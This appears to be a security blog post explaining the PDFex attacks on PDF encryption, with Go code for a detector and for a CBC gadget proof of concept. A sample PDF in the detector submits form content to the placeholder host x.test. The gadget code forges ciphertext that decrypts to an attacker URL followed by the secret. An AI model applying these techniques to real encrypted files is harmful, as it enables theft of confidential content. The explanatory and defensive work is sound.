PDFex – A New Attack to Break PDF Encryption

Portable Document Format (PDF) is a file format used to present and exchange documents independently of software, hardware, or operating system. Invented by Adobe, PDF is an open standard maintained by the International Organization for Standardization (ISO).


  1. Definition
  2. What about the Attack?
  3. How the Data is Exfiltrated?
  4. PDF Encryption Attack Scenario
  5. Defense Mechanism, Precautions for PDF security.


When you work with electronic documents, it is necessary to make protection a part of your routine. You can password-protect your PDFs to prevent others from copying and editing them. This brings us to a recent attack, PDFex: a new attack method that extracts the contents of encrypted PDF files as plain text. The attack does not target the encryption applied to one particular PDF, but weaknesses in the encryption scheme defined by the PDF standard itself.


What about the attack?

PDFex comes in two variants: direct exfiltration and exfiltration via CBC gadgets. Direct exfiltration relies on the fact that PDF encryption does not cover the entire document: only strings and streams are encrypted, while the object structure around them stays readable, and the standard even permits mixing encrypted and unencrypted content. The exfiltration itself is carried out through a PDF form, a hyperlink, or JavaScript code that the attacker adds to the encrypted file.

The researchers tested 27 widely used PDF viewers. Adobe Acrobat, Foxit Reader, Evince, Nitro, and the PDF viewers built into Chrome and Firefox were among those found vulnerable. The primary aspects of the attack are the following:

  1. An attacker can manipulate an encrypted PDF file without knowing the corresponding password.
  2. PDF encryption uses the Cipher Block Chaining (CBC) mode without any integrity check, which allows anyone to create self-exfiltrating ciphertext parts using CBC malleability gadgets.
  3. Like many data formats, PDF allows an attacker to include their own content in a document, which opens exfiltration channels.

How the Data is Exfiltrated?

PDF documents are vulnerable to two attack types – Direct Exfiltration and CBC Gadgets.

Direct Exfiltration takes advantage of the fact that a PDF is never entirely encrypted. Since the document structure is readable, an attacker can modify the unencrypted parts, add their own unencrypted objects, or wrap the encrypted parts in a context they control. The wrapping is done with PDF forms, hyperlinks, or JavaScript, matching the three kinds of actions a viewer executes: submit a form, invoke a URL, and execute JavaScript. The attacker then sends the manipulated document to the victim. Once the victim opens the file, the viewer decrypts the wrapped content and the action sends it, in plaintext, to the attacker's server in an HTTP request.
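The fact that the object structure of an encrypted PDF stays readable also works in the defender's favour. The following is an added example, written for this page in Go with only the standard library (it is not code from the PDFex researchers or from any PDF library): a raw-byte triage check that flags encrypted documents which also carry one of the three action types named above, or which declare the Identity crypt filter so that strings or streams are left unencrypted. The two PDF skeletons are constructed samples, x.test is a placeholder host, and the hex string stands in for ciphertext.

```go
package main

import (
	"fmt"
	"regexp"
)

// indicator pairs a human-readable finding with the regexp that detects it in
// the raw bytes of a PDF. Names and dictionary keys are never encrypted by PDF
// encryption, so these patterns are visible without knowing the password.
type indicator struct {
	finding string
	re      *regexp.Regexp
}

var indicators = []indicator{
	{"document is encrypted (/Encrypt in trailer)", regexp.MustCompile(`/Encrypt\b`)},
	{"action runs automatically on open (/OpenAction)", regexp.MustCompile(`/OpenAction\b`)},
	{"additional-actions dictionary present (/AA)", regexp.MustCompile(`/AA\b`)},
	{"form submission action (/SubmitForm)", regexp.MustCompile(`/S\s*/SubmitForm\b`)},
	{"URI action (/URI)", regexp.MustCompile(`/S\s*/URI\b`)},
	{"JavaScript action (/JavaScript or /JS)", regexp.MustCompile(`/S\s*/JavaScript\b|/JS\b`)},
	{"Identity crypt filter leaves strings or streams unencrypted", regexp.MustCompile(`/(StrF|StmF)\s*/Identity\b`)},
	{"plaintext URL literal present", regexp.MustCompile(`https?://[^\s)>]+`)},
}

// exfilChannels are the findings that correspond to the three action types the
// text describes: submit a form, invoke a URL, execute JavaScript.
var exfilChannels = map[string]bool{
	indicators[3].finding: true,
	indicators[4].finding: true,
	indicators[5].finding: true,
}

// Triage returns every indicator matched in the raw file, in a fixed order.
// Limitation: objects packed into compressed object streams (/ObjStm) are not
// visible to a raw scan; a full tool has to parse and inflate them first.
func Triage(pdf []byte) []string {
	var found []string
	for _, ind := range indicators {
		if ind.re.Match(pdf) {
			found = append(found, ind.finding)
		}
	}
	return found
}

// IsSuspicious reports whether the file is encrypted and at the same time
// carries an action that could send decrypted content out of the viewer.
func IsSuspicious(pdf []byte) bool {
	encrypted, channel := false, false
	for _, f := range Triage(pdf) {
		if f == indicators[0].finding {
			encrypted = true
		}
		if exfilChannels[f] {
			channel = true
		}
	}
	return encrypted && channel
}

// Constructed sample: an encrypted document (encryption dictionary in 7 0) to
// which a SubmitForm action wired to /OpenAction has been added, with /StrF
// switched to /Identity so the attacker's URL string stays readable.
var suspiciousPDF = []byte(`%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R /AcroForm << /Fields [6 0 R] >> >> endobj
5 0 obj << /S /SubmitForm /F << /FS /URL /F (http://x.test/collect) >> /Fields [6 0 R] /Flags 4 >> endobj
6 0 obj << /FT /Tx /T (content) /V <6d1f3a9c> >> endobj
7 0 obj << /Filter /Standard /V 5 /R 6 /Length 256 /P -1 /CF << /StdCF << /CFM /AESV3 /AuthEvent /DocOpen /Length 32 >> >> /StmF /StdCF /StrF /Identity >> endobj
trailer << /Root 1 0 R /Encrypt 7 0 R >>
`)

// Constructed benign sample: encrypted, no actions, no plaintext URL.
var benignPDF = []byte(`%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
7 0 obj << /Filter /Standard /V 5 /R 6 /Length 256 /P -1 /CF << /StdCF << /CFM /AESV3 >> >> /StmF /StdCF /StrF /StdCF >> endobj
trailer << /Root 1 0 R /Encrypt 7 0 R >>
`)

func main() {
	for name, pdf := range map[string][]byte{"suspicious": suspiciousPDF, "benign": benignPDF} {
		fmt.Printf("%s: suspicious=%v\n", name, IsSuspicious(pdf))
		for _, f := range Triage(pdf) {
			fmt.Println("  -", f)
		}
	}
}
```

A check like this belongs at a mail gateway or in a document-intake pipeline rather than in the viewer: an encrypted PDF that carries form-submission, URI or JavaScript actions has no legitimate reason to exist in most organisations, and the decision can be made before anyone types the password.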

CBC Gadgets. In this technique the attacker exfiltrates the plaintext by exploiting the malleability of CBC mode: PDF encryption defines no authenticated encryption, so the plaintext of an encrypted object can be modified without knowing the key. The CBC attack has two preconditions: a known plaintext and an exfiltration channel. A block of known plaintext, together with its ciphertext, is used to craft gadgets that inject attacker-chosen text into an encrypted object. For AESV3, the most recent encryption algorithm in the PDF standard, such a known plaintext is always available from the Perms entry of the encryption dictionary. The exfiltration channel is again a hyperlink or a PDF form.
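The CBC gadget construction described above, as an added example written for this page in Go with only the standard library (it is not code from the PDFex researchers). It assumes an attacker who holds one full 16-byte known plaintext block together with its ciphertext, a simplification of what the Perms entry supplies, uses constructed sample content, and uses x.test as a placeholder hostname. The forged stream decrypts to an attacker-chosen URL prefix, 16 bytes of garbage, and the untouched original content; fitting that garbage block into valid PDF syntax is a detail the example does not address.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

const bs = aes.BlockSize // AESV2/AESV3 prefix each encrypted string or stream with a 16-byte IV

func xorBlocks(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

func mustCipher(key []byte) cipher.Block {
	blk, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	return blk
}

// padSpaces block-aligns the constructed sample (real PDF padding is PKCS#5, irrelevant here).
func padSpaces(b []byte) []byte {
	for len(b)%bs != 0 {
		b = append(b, ' ')
	}
	return b
}

// EncryptStream models the document creator: random IV, AES-CBC, no MAC.
func EncryptStream(key, plaintext []byte) []byte {
	iv := make([]byte, bs)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	body := make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(mustCipher(key), iv).CryptBlocks(body, plaintext)
	return append(iv, body...)
}

// DecryptStream models the viewer: first block is the IV, the rest is data.
// Nothing here can notice that blocks were inserted or spliced together.
func DecryptStream(key, stream []byte) []byte {
	out := make([]byte, len(stream)-bs)
	cipher.NewCBCDecrypter(mustCipher(key), stream[:bs]).CryptBlocks(out, stream[bs:])
	return out
}

// PermsLikePair models the known plaintext the text points to. The AESV3 Perms
// entry is one block encrypted with AES-256 in ECB mode under the file key; one
// ECB block equals CBC with an all-zero previous block, so (knownPT, zeros,
// knownCT) is a ready-made gadget source. Simplification: all 16 bytes known.
func PermsLikePair(key, knownPT []byte) (knownPrev, knownCT []byte) {
	knownCT = make([]byte, bs)
	mustCipher(key).Encrypt(knownCT, knownPT)
	return make([]byte, bs), knownCT
}

// Gadget returns two ciphertext blocks (prev', knownCT). In CBC, P_i = D(C_i) XOR C_{i-1}
// and D(knownCT) = knownPT XOR knownPrev, so prev' = knownPT XOR knownPrev XOR want makes
// knownCT decrypt to `want`. prev' itself decrypts to 16 unpredictable bytes.
func Gadget(knownPT, knownPrev, knownCT, want []byte) []byte {
	if len(want) != bs {
		panic("want must be exactly one block")
	}
	g := xorBlocks(xorBlocks(knownPT, knownPrev), want)
	return append(g, knownCT...)
}

// SelfExfiltrating prepends a gadget to a stream the attacker cannot read.
//   new stream : prev' | knownCT | IV_orig | C1..Cn
//   decrypts to: want  | garbage | P1..Pn
// IV_orig stays in front of C1, so the original plaintext survives; the one
// garbage block is where IV_orig is now decrypted as data.
func SelfExfiltrating(knownPT, knownPrev, knownCT, want, origStream []byte) []byte {
	return append(Gadget(knownPT, knownPrev, knownCT, want), origStream...)
}

func main() {
	key := make([]byte, 32) // AES-256 file key; only the victim's viewer has it
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	// Constructed sample content and known block; x.test is a placeholder host.
	secret := padSpaces([]byte("BT /F1 12 Tf (Q3 revenue: 4.2M) Tj ET"))
	knownPrev, knownCT := PermsLikePair(key, []byte("0123456789abcdef"))
	forged := SelfExfiltrating([]byte("0123456789abcdef"), knownPrev, knownCT,
		[]byte("(http://x.test/?"), EncryptStream(key, secret)) // 16-byte URL prefix
	got := DecryptStream(key, forged)
	fmt.Printf("chosen: %q\ngarbage: %x\nsecret: %q\nintact: %v\n", got[:bs], got[bs:2*bs], got[2*bs:], bytes.Equal(got[2*bs:], secret))
}
```

The attacker never touches the key: the whole construction is XORs on ciphertext blocks plus one known plaintext/ciphertext pair. The same arithmetic works for RC4 and AESV2 documents as long as a known block exists; what authenticated encryption (or any MAC over the ciphertext) would add is exactly the check that makes the spliced stream fail to decrypt.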


PDF Encryption Attack Scenarios:

It is assumed that the attacker already has access to the encrypted PDF document but knows neither the password nor the decryption key. The attacker can still modify the file: change the document structure, add new objects, and send the modified file to the victim. The attacks are further classified by the interaction they need:

  1. Without user interaction: the victim only needs to open the manipulated PDF file; displaying the document is enough to trigger the leak.
  2. With user interaction: the victim has to interact with the PDF document, for example with a single mouse click.

The attack is considered successful when the attacker obtains all or part of the encrypted document's content in plaintext.

PDF encryption is widely used in the public and private sectors to protect sensitive information. Providers such as IBM offer PDF encryption services for PDF documents and other data (for example confidential images) by wrapping them into a PDF. The alarming results of the viewer evaluation point to two root causes for such decryption and exfiltration attacks. First, many data formats, for example XML, S/MIME, and PDF, allow encrypting only parts of the content. This flexibility is difficult to handle and enables an attacker to include their own content, which leads to exfiltration channels. Second, AES-CBC, and more generally encryption without integrity protection, is still widely supported.

All of these attacks require the attacker to be in a position to modify the encrypted PDF file, for example by intercepting the victim's network traffic or by having access to the storage system holding the file. These preconditions limit the situations in which PDFex applies, but they are exactly the situations encryption is supposed to protect against; an encryption scheme that fails there offers no real protection.

Defense Mechanism, Precautions for PDF security:

Why should a PDF be Encrypted?

  1. Protect sensitive information.
  2. Limit access to only authorized users.
  3. To enforce PDF permissions -printing, copying, editing, etc.

Encrypting a PDF file is a simple way of securing its data, but password protection on its own is not enough. Weak passwords can be cracked, users can share passwords with others, and PDF permissions are easily removed even when a strong password is used. The following precautions apply when encrypting PDFs:

  1. Stop unauthorized access and restrict making multiple copies of the PDF.
  2. Set strong passwords and restrict permissions.
  3. Avoid sharing PDFs that carry sensitive information through cloud services.
  4. Prevent printing, copying, and modifying.
  5. Restrict usage rights to a limited set of specific users.

This was all about PDFex and how your PDF files containing sensitive information can be protected. It also brings us back to how malware can turn a PC into a zombie proxy. It is not only botnets (networks of private computers infected with malware without the owners' knowledge) that hijack PCs for malicious purposes; individual malware strains do it too. Regardless of whether the infected machines were used as proxies or to commit fraud, the modular nature of such malware means its handlers could equip it with new modules to carry out other attacks. The worrying part of these vulnerabilities lies in how sophisticated, and arguably slick, malware is getting. Terrifying, isn't it? But don't be. Blarrow to the rescue, always. To know more, visit https://blarrow.tech/nodersok-a-zombie-proxie-apocalypse/





An Architect by profession and practice, Pranita is a keen observer and specialises in content, visualisation, and presentation. Cyber attacks and architecture technology in a far more technologically advanced world made her realise that there is a lack of necessary awareness among people. Hence, she keeps you all updated and protected by all means, with subjects ranging from Architecture Technology to Security Awareness. Currently working as Head of Content, content writer and creator at BLARROW.TECH.


